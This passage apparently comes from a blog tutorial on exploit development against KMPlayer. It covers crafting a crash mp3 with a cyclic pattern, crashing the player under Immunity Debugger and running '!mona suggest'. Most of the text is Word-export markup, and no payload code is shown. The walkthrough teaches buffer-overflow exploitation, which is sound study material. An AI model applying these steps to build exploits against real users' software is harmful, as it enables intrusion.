mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Copy the pattern, replace junk content with this and regenerate the mp3 file.</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_jf7mrJdfyw/Tgwk-fP4OuI/AAAAAAAAAVU/eMIOJDxzvLw/s1600/crash-file-wth-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="http://2.bp.blogspot.com/-_jf7mrJdfyw/Tgwk-fP4OuI/AAAAAAAAAVU/eMIOJDxzvLw/s400/crash-file-wth-pattern.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Now run the KMPlayer from Immunity Debbuger as it is still ‘paused’ and open newly created mp3 file in KMPlayer.</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ETgAoQ8W5R0/Tgwk_Cc7A3I/AAAAAAAAAVY/1YECMwB1aF0/s1600/crash-wth-pattern.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://1.bp.blogspot.com/-ETgAoQ8W5R0/Tgwk_Cc7A3I/AAAAAAAAAVY/1YECMwB1aF0/s400/crash-wth-pattern.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">The KMPlayer is crashed as expected. Now run </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona suggest</span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"> command. </span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-nzhKiOI-kA4/TgwlBM8F1nI/AAAAAAAAAVo/vRYObRJNFMs/s1600/mona-suggest.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-nzhKiOI-kA4/TgwlBM8F1nI/AAAAAAAAAVo/vRYObRJNFMs/s400/mona-suggest.JPG" width="400" /></a></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
